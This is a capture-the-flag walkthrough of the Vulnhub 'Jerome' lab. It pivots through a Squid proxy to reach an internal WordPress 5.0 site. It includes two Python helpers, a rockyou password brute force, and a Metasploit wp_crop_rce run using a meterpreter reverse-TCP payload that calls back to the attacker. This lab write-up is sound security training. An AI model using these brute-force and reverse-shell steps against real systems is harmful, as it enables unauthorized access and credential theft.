Jerome
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.16.95.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:0b:79:0e 2 120 PCS Systemtechnik GmbH
192.168.56.152 08:00:27:3e:42:78 1 60 PCS Systemtechnik GmbH
Using netdiscover, which ships with Kali Linux, the target host is identified as 192.168.56.152 (192.168.56.1 is the host-only adapter of the attacking machine and 192.168.56.100 is VirtualBox's DHCP server on that network).
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.152 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-05 09:06 EDT
Nmap scan report for bogon (192.168.56.152)
Host is up (0.00015s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
8080/tcp open http-proxy Squid http proxy 3.5.27
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.5.27
MAC Address: 08:00:27:3E:42:78 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.89 seconds
The target exposes a single open port, 8080, running a Squid 3.5.27 HTTP proxy. The http-title nmap reports ("The requested URL could not be retrieved") is Squid's own error page, so any web content has to be reached through the proxy rather than on it.
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ searchsploit squid
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
MySQL Squid Access Report 2.1.4 - HTML Injection | php/webapps/20055.txt
MySQL Squid Access Report 2.1.4 - SQL Injection / Cross-Site Scripting | php/webapps/44483.txt
National Science Foundation Squid Proxy 2.3 - Internet Access Control Bypass | linux/remote/24105.txt
National Science Foundation Squid Web Proxy 1.0/1.1/2.1 - Authentication Failure | linux/remote/19567.txt
PageSquid CMS 0.3 Beta - 'index.php' SQL Injection | php/webapps/5899.txt
Squid - 'httpMakeVaryMark()' Remote Denial of Service | linux/dos/38365.txt
Squid - NTLM (Authenticated) Overflow (Metasploit) | linux/remote/16847.rb
Squid 2.0-4 - Cache FTP Proxy URL Buffer Overflow | unix/remote/21297.c
Squid 2.4.1 - Remote Buffer Overflow | linux/remote/347.c
Squid 2.5.x/3.x - NTLM Buffer Overflow (Metasploit) | multiple/remote/9951.rb
Squid 3.3.5 - Denial of Service (PoC) | linux/dos/26886.pl
Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service | multiple/dos/8021.pl
Squid Analysis Report Generator 2.3.10 - Remote Code Execution | php/webapps/42993.txt
Squid Proxy 2.4/2.5 - NULL URL Character Unauthorized Access | linux/remote/23777.txt
Squid Proxy 2.5/2.6 - FTP URI Remote Denial of Service | linux/dos/29473.txt
Squid Web Proxy 2.2 - 'cachemgr.cgi' Unauthorized Connection | cgi/remote/20465.sh
Squid Web Proxy 2.3 - Reverse Proxy | linux/remote/21017.txt
SquidGuard 1.4 - Long URL Handling Remote Denial of Service | xml/dos/37685.txt
SquidGuard 1.x - NULL URL Character Unauthorized Access | linux/remote/23848.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Nothing usable: these entries target Squid 2.x/3.3.x or unrelated products, so there is no direct exploit for Squid 3.5.27.
Since the only exposed service is a forward proxy, enumerate web content through it instead: give gobuster --proxy http://192.168.56.152:8080 and a target URL of http://127.0.0.1/, so that Squid forwards each request to a web server listening on the target's own loopback interface.
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ gobuster dir --proxy http://192.168.56.152:8080 -u http://127.0.0.1/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://127.0.0.1/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Proxy: http://192.168.56.152:8080
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/05 09:11:28 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 200) [Size: 7550]
Progress: 219853 / 220561 (99.68%)
===============================================================
2022/11/05 09:12:21 Finished
===============================================================
This finds /server-status, Apache's mod_status page.
Configure the browser on Kali to use the proxy (http://192.168.56.152:8080) and open http://127.0.0.1/server-status. Besides the Apache version, the worker table has a VHost column showing which host:port each worker last served.
It lists a listener on port 1337, so run directory enumeration against that port as well, still through the proxy:
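The two steps above (pivot through Squid to the loopback web server, then read the VHost column off /server-status) can be scripted. The following is an added example for this writeup, not code from the original post: it fetches the status page through the proxy with urllib, checks the Via header to confirm the request really went through Squid, and extracts every host:port the VHost column lists. The proxy address is the one from the scan; the status-page HTML embedded in the script is a constructed sample in the shape of mod_status output, because the real page is only shown as a screenshot in the post.

```python
"""Pivot through the target's Squid proxy and mine Apache's /server-status page
for internal listeners.  Added example for this writeup; the embedded HTML is a
constructed sample modelled on mod_status output, not captured from the box."""
import os
import re
import urllib.request

PROXY = "http://192.168.56.152:8080"           # the only open port on the target
STATUS_URL = "http://127.0.0.1/server-status"  # reached via the proxy, not directly

# Constructed sample: three worker rows, one serving the default vhost on :80
# and two serving the vhost on :1337.  Column order follows mod_status.
SAMPLE_STATUS = """<html><body><h1>Apache Server Status for 127.0.0.1 (via 127.0.0.1)</h1>
<table border="0"><tr><th>Srv</th><th>PID</th><th>Acc</th><th>M</th><th>CPU</th><th>SS</th>
<th>Req</th><th>Conn</th><th>Child</th><th>Slot</th><th>Client</th><th>Protocol</th>
<th>VHost</th><th>Request</th></tr>
<tr><td><b>0-0</b></td><td>1013</td><td>0/7/7</td><td>_</td><td>0.01</td><td>3</td><td>0</td>
<td>0.0</td><td>0.02</td><td>0.02</td><td>127.0.0.1</td><td>http/1.1</td>
<td nowrap>127.0.0.1:80</td><td nowrap>GET /server-status HTTP/1.1</td></tr>
<tr><td><b>1-0</b></td><td>1014</td><td>0/3/3</td><td>_</td><td>0.00</td><td>120</td><td>0</td>
<td>0.0</td><td>0.01</td><td>0.01</td><td>127.0.0.1</td><td>http/1.1</td>
<td nowrap>127.0.0.1:1337</td><td nowrap>GET /wordpress/ HTTP/1.1</td></tr>
<tr><td><b>2-0</b></td><td>1015</td><td>0/1/1</td><td>_</td><td>0.00</td><td>900</td><td>0</td>
<td>0.0</td><td>0.00</td><td>0.00</td><td>127.0.0.1</td><td>http/1.1</td>
<td nowrap>127.0.0.1:1337</td><td nowrap>GET /wordpress/wp-login.php HTTP/1.1</td></tr>
</table></body></html>"""

# A table cell whose entire content is host:port.  Client cells carry a bare
# address and Request cells start with a method, so neither of those matches.
VHOST_CELL = re.compile(r"<td[^>]*>([A-Za-z0-9.-]+:\d{1,5})</td>")


def extract_vhosts(html):
    """Unique host:port values from the VHost column, ordered by host then port."""
    found = set(VHOST_CELL.findall(html))
    return sorted(found, key=lambda hp: (hp.rsplit(":", 1)[0], int(hp.rsplit(":", 1)[1])))


def vhost_urls(html):
    """Base URLs to hand to gobuster/wpscan (still via --proxy)."""
    return [f"http://{hp}/" for hp in extract_vhosts(html)]


def fetch_via_proxy(url, proxy=PROXY, timeout=10):
    """GET url through an HTTP forward proxy; return (status, Via header, body)."""
    # urllib honours $no_proxy; a stray "localhost,127.0.0.1" there would bypass
    # the proxy and hit Kali's own loopback instead of the target's.
    for var in ("no_proxy", "NO_PROXY"):
        os.environ.pop(var, None)
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({"http": proxy}))
    with opener.open(url, timeout=timeout) as resp:
        return resp.status, resp.headers.get("Via", ""), resp.read().decode("utf-8", "replace")


def enumerate_internal_targets(proxy=PROXY, status_url=STATUS_URL):
    """Live version: URLs found on the real status page behind the proxy."""
    _status, via, body = fetch_via_proxy(status_url, proxy)
    if "squid" not in via.lower():   # wpscan saw "Via: 1.1 jerome (squid/3.5.27)"
        raise RuntimeError(f"response did not come through Squid (Via: {via!r})")
    return vhost_urls(body)


if __name__ == "__main__":
    print(enumerate_internal_targets())
```

Run it against the box to get the list of base URLs to feed to the next gobuster/wpscan round; on the sample HTML the parser yields http://127.0.0.1:80/ and http://127.0.0.1:1337/. Clearing no_proxy matters: with that variable set, urllib silently talks to the attacker's own loopback and the "internal" scan would be scanning Kali.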
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ gobuster dir --proxy http://192.168.56.152:8080 -u http://127.0.0.1:1337/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://127.0.0.1:1337/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Proxy: http://192.168.56.152:8080
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/05 09:17:30 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 317] [--> http://127.0.0.1:1337/wordpress/]
/server-status (Status: 200) [Size: 7640]
Progress: 219337 / 220561 (99.45%)
===============================================================
2022/11/05 09:18:22 Finished
===============================================================
A WordPress site lives under /wordpress, so run wpscan next to enumerate users and plugins (-e u,p), again through the proxy:
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ wpscan --proxy http://192.168.56.152:8080 --url http://127.0.0.1:1337/wordpress/ -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://127.0.0.1:1337/wordpress/ [127.0.0.1]
[+] Started: Sat Nov 5 09:20:47 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.29 (Ubuntu)
| - X-Cache-Lookup: MISS from jerome:8080
| - Via: 1.1 jerome (squid/3.5.27)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://127.0.0.1:1337/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://127.0.0.1:1337/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://127.0.0.1:1337/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://127.0.0.1:1337/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
| Found By: Emoji Settings (Passive Detection)
| - http://127.0.0.1:1337/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'
| Confirmed By: Meta Generator (Passive Detection)
| - http://127.0.0.1:1337/wordpress/, Match: 'WordPress 5.0'
[i] The main theme could not be detected.
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==============================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] jerome
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] root
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Nov 5 09:20:50 2022
[+] Requests Done: 51
[+] Cached Requests: 4
[+] Data Sent: 16.109 KB
[+] Data Received: 143.36 KB
[+] Memory used: 199.699 MB
[+] Elapsed time: 00:00:02
Two usernames come out: jerome and root. Also worth noting from the output: XML-RPC is enabled, the uploads directory is listable, and the site runs WordPress 5.0 (released 2018-12-06), an old and insecure release.
Next, let wpscan brute-force passwords for those users against wp-login.php with rockyou.txt (-e u re-enumerates the users, -P supplies the wordlist):
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ wpscan --proxy http://192.168.56.152:8080 --url http://127.0.0.1:1337/wordpress/ -e u -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] Performing password attack on Wp Login against 2 user/s
[SUCCESS] - jerome / jerome
^C  Trying root / eric22 Time: 00:03:46 < > (28790 / 28689202) 0.10% ETA: 62:44:22
[!] Valid Combinations Found:
| Username: jerome, Password: jerome
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Nov 5 09:27:02 2022
[+] Requests Done: 28815
[+] Cached Requests: 41
[+] Data Sent: 16.366 MB
[+] Data Received: 120.038 MB
[+] Memory used: 154.848 MB
[+] Elapsed time: 00:03:49
Scan Aborted: Canceled by User
Credentials recovered: jerome / jerome. The attack on root was aborted by hand (the ETA for the rest of rockyou.txt was over 62 hours); one working account is enough to continue.
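wpscan's attack above posts to wp-login.php. Because the earlier scan reported xmlrpc.php reachable, the same credential check can be done with a single XML-RPC call, wp.getUsersBlogs, which takes only a username and password and answers with the user's blogs on success or a fault with code 403 otherwise; this is the method the wordpress_xmlrpc_login Metasploit module listed in the wpscan references uses. The script below is an added example, not part of the original post or of wpscan: it builds the call with the standard library's xmlrpc.client, sends it through the Squid proxy, and classifies the reply. The proxy and target URL are the ones from this box; the two embedded responses are constructed samples following the shape WordPress's XML-RPC server returns (the blog name is made up).

```python
"""Validate WordPress credentials via wp.getUsersBlogs over XML-RPC, routed
through the target's Squid proxy.  Added example for this writeup; the sample
responses are constructed to match the shape of WordPress's XML-RPC output."""
import os
import urllib.request
import xmlrpc.client as xc

PROXY = "http://192.168.56.152:8080"
XMLRPC_URL = "http://127.0.0.1:1337/wordpress/xmlrpc.php"  # reached via the proxy

# Constructed sample: what WordPress answers for a valid, non-admin user.
SAMPLE_OK = """<?xml version="1.0" encoding="UTF-8"?>
<methodResponse><params><param><value><array><data>
<value><struct>
<member><name>isAdmin</name><value><boolean>0</boolean></value></member>
<member><name>isPrimary</name><value><boolean>1</boolean></value></member>
<member><name>url</name><value><string>http://127.0.0.1:1337/wordpress/</string></value></member>
<member><name>blogid</name><value><string>1</string></value></member>
<member><name>blogName</name><value><string>Jerome</string></value></member>
<member><name>xmlrpc</name><value><string>http://127.0.0.1:1337/wordpress/xmlrpc.php</string></value></member>
</struct></value>
</data></array></value></param></params></methodResponse>"""

# Constructed sample: the fault WordPress returns for a wrong password.
SAMPLE_FAULT = """<?xml version="1.0" encoding="UTF-8"?>
<methodResponse><fault><value><struct>
<member><name>faultCode</name><value><int>403</int></value></member>
<member><name>faultString</name><value><string>Incorrect username or password.</string></value></member>
</struct></value></fault></methodResponse>"""


def build_login_call(username, password):
    """wp.getUsersBlogs needs only the credentials, so it is the cheapest
    authenticated method to probe; dumps() escapes XML metacharacters."""
    return xc.dumps((username, password), methodname="wp.getUsersBlogs")


def parse_login_response(body):
    """Map the XML-RPC reply to a plain dict: valid/invalid plus details."""
    try:
        (blogs,), _method = xc.loads(body)
    except xc.Fault as fault:                 # WordPress uses faultCode 403 for bad creds
        return {"valid": False, "code": fault.faultCode, "message": fault.faultString}
    return {
        "valid": True,
        "blogs": [{"name": b["blogName"], "url": b["url"], "admin": bool(b["isAdmin"])}
                  for b in blogs],
    }


def check_credentials(username, password, url=XMLRPC_URL, proxy=PROXY, timeout=10):
    """POST the call through the forward proxy and interpret the answer."""
    for var in ("no_proxy", "NO_PROXY"):      # a stray localhost bypass would hit Kali
        os.environ.pop(var, None)
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({"http": proxy}))
    req = urllib.request.Request(
        url, data=build_login_call(username, password).encode(),
        headers={"Content-Type": "text/xml", "User-Agent": "Mozilla/5.0"}, method="POST")
    with opener.open(req, timeout=timeout) as resp:
        return parse_login_response(resp.read().decode("utf-8", "replace"))


def first_valid(username, passwords, **kw):
    """Walk a wordlist and stop at the first accepted password (None if none)."""
    for pw in passwords:
        if check_credentials(username, pw, **kw)["valid"]:
            return pw
    return None


if __name__ == "__main__":
    print(check_credentials("jerome", "jerome"))
```

A successful reply also tells you whether the account is an administrator (isAdmin), which decides whether a theme or plugin editor upload is available or whether, as on this box, an author-level exploit is needed.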
Log into the WordPress dashboard through the proxy: http://localhost:1337/wordpress/wp-login.php
Next, try to get shell.php onto the server through the dashboard's media uploader.
WordPress rejects it: "shell.php: Sorry, this file type is not permitted for security reasons."
Renaming it to .php3 or .php5 is rejected as well.
.php%00jpg (a null-byte truncation attempt) does not get through either.
Following other writeups, fall back to the exploit Metasploit ships for this version: exploit/multi/http/wp_crop_rce, which uses author-level credentials to abuse the crop-image path traversal in WordPress 5.0.0 (CVE-2019-8942/8943) and plant a PHP payload. Since every HTTP request has to pass through Squid, the module's Proxies option must be set too.
msf6 exploit(multi/http/wp_crop_rce) > set PASSWORD jerome
PASSWORD => jerome
msf6 exploit(multi/http/wp_crop_rce) > set USERNAME jerome
USERNAME => jerome
msf6 exploit(multi/http/wp_crop_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_crop_rce) > set RPORT 1337
RPORT => 1337
msf6 exploit(multi/http/wp_crop_rce) > set Proxies http://192.168.56.152:8080
Proxies => http://192.168.56.152:8080
msf6 exploit(multi/http/wp_crop_rce) > set LHOST 192.168.56.137
LHOST => 192.168.56.137
msf6 exploit(multi/http/wp_crop_rce) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/http/wp_crop_rce) > show options
Module options (exploit/multi/http/wp_crop_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD jerome yes The WordPress password to authenticate with
Proxies http://192.168.56.152:8080 no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1337 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
USERNAME jerome yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.137 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
msf6 exploit(multi/http/wp_crop_rce) > set TARGETURI /wordpress
TARGETURI => /wordpress
msf6 exploit(multi/http/wp_crop_rce) > show options
Module options (exploit/multi/http/wp_crop_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD jerome yes The WordPress password to authenticate with
Proxies http://192.168.56.152:8080 no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1337 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
USERNAME jerome yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.137 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
msf6 exploit(multi/http/wp_crop_rce) > set ReverseAllowProxy true
ReverseAllowProxy => true
msf6 exploit(multi/http/wp_crop_rce) > exploit
[*] Started reverse TCP handler on 192.168.56.137:5555
[-] Exploit failed: SocketError getaddrinfo: Name or service not known
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_crop_rce) > exploit
[*] Started reverse TCP handler on 192.168.56.137:5555
[-] Exploit failed: SocketError getaddrinfo: Name or service not known
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_crop_rce) > set RHOSTS localhost
RHOSTS => localhost
msf6 exploit(multi/http/wp_crop_rce) > exploit
[*] Exploiting target 0.0.0.1
[*] Started reverse TCP handler on 192.168.56.137:5555
[-] Exploit failed: SocketError getaddrinfo: Name or service not known
[*] Exploiting target 127.0.0.1
[*] Started reverse TCP handler on 192.168.56.137:5555
[-] Exploit failed: SocketError getaddrinfo: Name or service not known
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_crop_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_crop_rce) > show options
The exploit fails before a single request reaches WordPress: getaddrinfo is raised while the module opens its socket to the proxy, not by anything on the target. The cause is the Proxies value. As the option help printed above says, Metasploit expects the form type:host:port, not a URL; with http://192.168.56.152:8080 the string is split on colons and the proxy host becomes //192.168.56.152, which cannot be resolved. Changing RHOSTS to localhost does not help, because RHOSTS was never the problem. Set Proxies to http:192.168.56.152:8080, keep RHOSTS 127.0.0.1, RPORT 1337, TARGETURI /wordpress and ReverseAllowProxy true, and run the exploit again. ReverseAllowProxy is needed because Metasploit otherwise refuses a reverse payload when Proxies is set; the PHP meterpreter itself connects back from the target straight to LHOST on 192.168.56.137:5555 and does not traverse Squid.
From: https://www.cnblogs.com/jason-huawen/p/16861719.html